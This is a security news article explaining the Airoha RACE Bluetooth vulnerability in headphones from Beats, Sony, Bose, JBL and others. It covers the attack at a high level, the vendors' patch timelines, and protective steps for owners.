Apple released a firmware patch this week for Beats Studio Buds that closes a high-severity Bluetooth vulnerability allowing an attacker standing nearby to listen through the earbuds' microphone — without ever touching the owner's phone. But the fix addresses only one corner of a supply-chain problem that spans nearly 30 confirmed products from Sony, Bose, JBL, Marshall, and at least seven other brands, all built on the same vulnerable chip.

If you own Bluetooth earbuds or headphones from any of the major brands listed in this article, your device may still be unpatched — and a nearby attacker could exploit that window in a coffee shop, an airport, or a hotel lobby.

The Flaw at the Center of Everything: RACE

The vulnerability traces to a proprietary protocol called RACE — short for Realtek/Airoha Command Extensions — embedded in Bluetooth system-on-chip hardware manufactured by Airoha Systems, a subsidiary of Taiwan's MediaTek. RACE was designed as a factory diagnostic tool, intended for use during production-line quality testing and firmware flashing. Its purpose was to let engineers read and write directly to a device's RAM and flash memory during manufacturing.

The problem is that it was shipped in consumer-facing firmware without any authentication gate.

ERNW researchers published full technical details of the RACE vulnerability in December 2025, alongside a white paper and a testing toolkit for consumers.

Airoha's Bluetooth chips expose RACE over two separate Bluetooth interfaces: Bluetooth Classic (the BR/EDR radio used for audio streaming and hands-free calling) and Bluetooth Low Energy (BLE, used for device control and status). In both cases, researchers confirmed that pairing — the cryptographic handshake that is supposed to prove device ownership before granting sensitive access — was not enforced. Any attacker within Bluetooth range could connect silently and invoke the RACE protocol without the device owner's knowledge.

This is the engineering failure behind three Common Vulnerabilities and Exposures designations from the National Vulnerability Database: CVE-2025-20700 (missing authentication for BLE GATT services), CVE-2025-20701 (missing authentication for Bluetooth BR/EDR connections), and CVE-2025-20702 (exploitation of privileged RACE protocol capabilities). CVE-2025-20701, the flaw Apple's patch addresses, carries a Common Vulnerability Scoring System rating of 8.8 out of 10, placing it firmly in the "High" severity band.

What an Attacker Can Do and How Far It Goes

Apple's own advisory described the risk in narrow terms, noting that an attacker within Bluetooth range could listen through the microphone of a Beats Studio Buds unit that was "not yet paired and actively seeking pair requests." That framing, accurate as far as it goes, describes only the simplest exploit.

The researchers who discovered the vulnerabilities — Dennis Heinze and Frieder Steinmetz of ERNW GmbH, a German cybersecurity firm — demonstrated a substantially more damaging attack chain at the 39C3 hacker conference in Hamburg in December 2025. In that demonstration, an attacker connected silently to a vulnerable headphone over BLE, used RACE to dump the device's flash memory, extracted the Bluetooth link keys stored there, and then used those keys to impersonate the headphones to the victim's paired smartphone. Once the phone accepted the rogue device as the legitimate headphones, the attacker used the Bluetooth Hands-Free Profile — the standard used for hands-free calling — to issue AT commands to the phone.

The results of that command access included: silently placing or answering calls; reading the victim's phone number, contact list, and call history; triggering Siri or Google Assistant to send messages; and eavesdropping on ambient audio by placing a silent call to an attacker-controlled number. Heinze and Steinmetz also used the chain at 39C3 to hijack a WhatsApp session and access Amazon account data.

"Any vulnerable device can be compromised if the attacker is in Bluetooth range," Heinze wrote in the initial June 2025 ERNW advisory. "That is the only precondition."

The full attack requires meaningful technical skill and sustained physical proximity. No confirmed real-world exploitation has been documented. However, ERNW noted that the calculus changes for journalists, executives, government officials, and diplomats — individuals in environments where a conversation's contents carry high value and where an adversary with the resources to execute the attack is more likely to be present.

A Debugging Tool That Was Never Supposed to Face Consumers

The deeper structural problem exposed by the Airoha case is not a missing patch — it is a missing boundary.

When Airoha designed the RACE protocol for factory use, no mechanism existed in the SDK to disable or gate it before devices left the production line. Manufacturers who licensed Airoha's chips received reference firmware that included RACE as an active, unauthenticated interface. Most built their products on top of that reference implementation without knowing — or removing — the factory tool that was still running inside.

This is the pattern that distinguishes an SDK supply-chain vulnerability from a conventional product flaw. A single company making a mistake affects its own customers. An SDK vendor shipping a flaw to 30-plus manufacturers creates 30-plus independent patch obligations, each with its own release cadence, update infrastructure, and consumer awareness campaign. Some of those manufacturers may release fixes quickly; others may never issue one.

Airoha shipped a corrected SDK to device makers on June 4, 2025 — eight days before ERNW's initial partial disclosure at TROOPERS 2025, and after the company did not respond for over two months following ERNW's March 25, 2025 disclosure. Airoha issued its first response on May 27, 2025, a full 63 days after researchers first contacted the company.

Who Has Patched and Who Has Not

The patch timeline across the confirmed affected brands has been uneven.

JBL moved fastest among the major vendors. The company released over-the-air firmware updates for the JBL Live Buds 3 (version 8.0.0) on July 8, 2025, and for the JBL Endurance Race 2 (version 5.4.0) on July 30, 2025, through the JBL Headphones app. Bose confirmed a fix for the QuietComfort Earbuds was available by January 2026. Marshall and Beyerdynamic both issued updates in the months following Airoha's patched SDK release. Sony, which initially failed to respond to ERNW's direct communications, acknowledged the issue only after learning it would be disclosed publicly at TROOPERS 2025, and released firmware updates in early 2026.

Jabra's response was more complex: ERNW's technical testing found that the Jabra Elite 8 Active earbuds were not vulnerable to CVE-2025-20701's Bluetooth Classic vector, apparently because Jabra had independently configured its SDK to enforce pairing on Classic connections. The Jabra Link 390 Bluetooth adapter received a firmware fix in December 2025.

Apple's Beats Studio Buds Firmware Update 1B211 shipped June 16, 2026 — roughly twelve months after Airoha delivered the patched SDK to its hardware partners. Apple's advisory described the flaw as rooted in "open source code" and noted that Apple software was among the affected projects. The patch deploys automatically when the earbuds are placed in their charging case near a paired iPhone, iPad, or Mac. Users can confirm their firmware version at Settings → Bluetooth → tap the info icon next to Beats Studio Buds.

Apple's AirPods Pro 2 and AirPods Pro 3 received a separate firmware update (8B41) on the same day but required no CVE-2025-20701 fix; those models run Apple's proprietary audio silicon rather than an Airoha chip.

What This Means for Workplaces Using Wireless Earbuds

The pairing-window vulnerability carries particular weight in professional settings. Bluetooth earbuds have become standard equipment for video calls, internal meetings, and voice communications in corporate environments. An employee who opens their earbud case near an attacker — in a conference lobby, a shared coworking space, or on public transit — briefly broadcasts a pairing request to any device within range.

ERNW specifically called out high-risk groups in its original advisory: journalists, attorneys, diplomats, executives, and anyone in a role where overheard audio carries material value to a third party.

Beyond the immediate eavesdropping risk, the full attack chain — link key extraction, device impersonation, Bluetooth Hands-Free Profile command injection — represents an attack surface that does not require the phone to be compromised at all. The phone's own trust model is exploited using credentials extracted from the headphone.

Enterprise security teams should audit which Bluetooth audio devices are in use across their organizations and verify firmware versions against the affected product list in ERNW's White Paper 74, published December 27, 2025, which details the full scope of affected hardware and recommended remediation steps.

How to Protect Yourself Now

For Beats Studio Buds owners, Firmware Update 1B211 closes CVE-2025-20701. To trigger the update manually: place both earbuds in the charging case, close the lid, connect the case to power or ensure it is charged, and keep the case within Bluetooth range of a paired iPhone, iPad, or Mac for at least 30 minutes. The update installs automatically.

For owners of other affected hardware, firmware update status varies by manufacturer. JBL, Bose, Marshall, and Beyerdynamic have all released patches accessible through their companion apps or support pages. Sony updates are available through the Sony Headphones Connect app. Users of devices from lesser-known Airoha-chip brands should check their manufacturer's support pages directly.

Until a patch is confirmed installed, ERNW recommends the following practices: check firmware immediately using the manufacturer's companion app; remove unknown paired devices from your phone's Bluetooth settings; avoid leaving earbuds in undiscovered pairing mode in high-risk environments; and disable Bluetooth when not in active use. For high-sensitivity professional environments, wired audio connections eliminate the attack surface entirely.

The publicly released RACE Toolkit allows technically capable users and security researchers to test whether a specific device remains vulnerable.

Frequently Asked Questions

Are AirPods affected by the Airoha Bluetooth flaw?

No. AirPods Pro 2 and AirPods Pro 3 run Apple's proprietary audio silicon and are not built on Airoha chips. They received a separate firmware update (8B41) on June 16, 2026, but that update did not include a CVE-2025-20701 fix because none was needed.

Which headphones are confirmed vulnerable to CVE-2025-20701?

Confirmed affected devices include Sony's WF-1000XM5, WH-1000XM5, and WH-1000XM6; the Bose QuietComfort Earbuds; the JBL Live Buds 3 and Endurance Race 2; and multiple Marshall models including the Motif II, Major V, Minor IV, and Stanmore III. The full confirmed list covers approximately 29 products from 10 brands. Any device using an Airoha Bluetooth chip not on the confirmed list should be treated as potentially vulnerable until the manufacturer confirms otherwise. Use the ERNW RACE Toolkit to test specific devices.

Can someone listen through my earbuds without me knowing?

Yes — under specific conditions. CVE-2025-20701 allows a nearby attacker to connect to unpaired Beats Studio Buds (or other affected devices) while they are actively broadcasting pairing requests, and then use the microphone. The full attack chain requires meaningful technical skill, sustained physical proximity, and the target device to be in pairing mode. No confirmed real-world exploitation has been documented. Applying available firmware patches eliminates the vulnerability.

Does this Airoha chip flaw affect devices I already own, even if I bought them years ago?

Yes. The vulnerability exists in the Airoha chip's firmware and affects all devices built on vulnerable Airoha chip variants regardless of purchase date. The fix requires a firmware update delivered by each individual manufacturer — not an operating system update. If your manufacturer has not released a patch, the device remains exposed.